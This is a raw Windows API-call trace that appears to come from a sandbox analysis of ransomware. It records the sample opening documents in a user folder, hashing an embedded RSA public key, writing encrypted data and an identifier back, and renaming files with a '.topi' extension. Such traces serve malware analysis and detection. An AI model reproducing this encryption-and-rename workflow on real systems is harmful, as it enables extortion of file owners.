HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0094.887] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0094.887] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0094.887] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0094.887] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0094.887] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.887] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0094.887] WriteFile (in: hFile=0x6a8, lpBuffer=0x99f72d8*, nNumberOfBytesToWrite=0x8e26, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x99f72d8*, lpNumberOfBytesWritten=0x9ccfb14*=0x8e26, lpOverlapped=0x0) returned 1 [0094.887] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f72d8 | out: hHeap=0x680000) returned 1 [0094.888] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x8e2b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.888] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0094.888] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0094.888] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.888] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0094.888] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0094.888] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0094.888] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.888] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.888] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0094.888] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0094.888] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0094.888] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0094.888] CloseHandle (hObject=0x6a8) returned 1 [0094.891] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0094.891] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x880) returned 0x31cf750 [0094.891] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0094.891] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8_akOq5K7U9Vl.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8_akoq5k7u9vl.doc"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8_akOq5K7U9Vl.doc.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8_akoq5k7u9vl.doc.topi")) returned 1 [0094.892] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0094.892] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.892] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.893] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b41c0 | out: hHeap=0x680000) returned 1 [0094.893] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x769e4600, ftCreationTime.dwHighDateTime=0x1d58c64, ftLastAccessTime.dwLowDateTime=0xa907c4c0, ftLastAccessTime.dwHighDateTime=0x1d53c70, ftLastWriteTime.dwLowDateTime=0xa907c4c0, ftLastWriteTime.dwHighDateTime=0x1d53c70, nFileSizeHigh=0x0, nFileSizeLow=0x6c5e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="b HXAcX9_11Ge0W8.pptx", cAlternateFileName="BHXACX~1.PPT")) returned 1 [0094.893] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.893] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8e) returned 0x31b41c0 [0094.893] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.893] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\b HXAcX9_11Ge0W8.pptx") returned=".pptx" [0094.893] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\b HXAcX9_11Ge0W8.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\b hxacx9_11ge0w8.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0094.894] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=27742) returned 1 [0094.894] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0094.897] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x6c38, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.897] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0094.898] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.898] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.898] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.898] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x6c5e, lpOverlapped=0x0) returned 1 [0094.899] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.899] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0094.899] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.899] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.899] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df3c0) returned 1 [0094.900] CryptCreateHash (in: hProv=0x6df3c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0094.900] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0094.900] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0094.900] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0094.900] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0094.900] GetLastError () returned 0x0 [0094.900] CryptDestroyHash (hHash=0x31c7580) returned 1 [0094.900] CryptReleaseContext (hProv=0x6df3c0, dwFlags=0x0) returned 1 [0094.900] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0094.900] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0094.901] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0094.901] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.901] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0094.901] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.901] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.901] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x6c60) returned 0x99f72d8 [0094.901] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0094.901] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.901] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0094.901] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.901] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0094.901] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0094.901] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d4078 [0094.901] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9210 [0094.901] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x6ebf78 [0094.901] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9228 [0094.901] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9258 [0094.901] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.901] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9270 [0094.901] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0094.902] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0094.902] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0094.902] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0094.902] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9258 | out: hHeap=0x680000) returned 1 [0094.902] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9270 | out: hHeap=0x680000) returned 1 [0094.902] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0094.902] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0094.902] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.902] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.902] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0094.902] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9270 [0094.902] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0094.902] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9258 [0094.902] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0094.902] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0094.902] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0094.902] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0094.902] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0094.902] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0094.902] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0094.902] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0094.902] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.902] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9270 | out: hHeap=0x680000) returned 1 [0094.902] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.902] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9258 | out: hHeap=0x680000) returned 1 [0094.903] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0094.903] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0094.903] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0094.903] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0094.903] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0094.903] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0094.903] GetCurrentThreadId () returned 0x8c4 [0094.903] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0094.903] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f5410 [0094.903] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0094.903] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0094.903] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0094.903] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0094.903] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.903] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0094.903] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.903] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.903] GetCurrentThreadId () returned 0x8c4 [0094.903] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.903] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.903] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0094.903] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.903] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.903] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.903] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.903] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0094.904] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0094.904] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0094.904] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb510 [0094.904] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0094.904] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0094.904] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.904] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.904] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.904] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.904] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0094.904] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0094.904] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0094.904] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0094.904] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0094.904] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.904] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9258 [0094.904] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0094.904] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0094.904] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.904] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.904] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0094.904] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0094.904] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0094.904] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9270 [0094.904] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0094.904] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0094.904] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0094.905] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9240 [0094.905] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0094.905] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0094.905] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.905] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0094.905] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0094.905] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0094.905] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0094.905] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9288 [0094.905] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0094.905] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8eb0 [0094.905] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0094.905] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0094.905] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0094.905] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0094.905] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0094.905] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0094.905] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9258 | out: hHeap=0x680000) returned 1 [0094.905] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9258 [0094.905] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0094.905] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0094.905] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0094.905] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0094.905] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0094.905] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9300 [0094.905] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0094.905] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0094.906] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0094.906] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0094.906] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9258 | out: hHeap=0x680000) returned 1 [0094.906] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0094.906] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0094.906] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0094.906] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.906] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0094.906] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0094.906] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0094.906] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0094.906] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0094.906] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0094.906] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0094.906] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.906] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0094.906] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9288 | out: hHeap=0x680000) returned 1 [0094.906] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.906] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0094.906] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0094.906] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9270 | out: hHeap=0x680000) returned 1 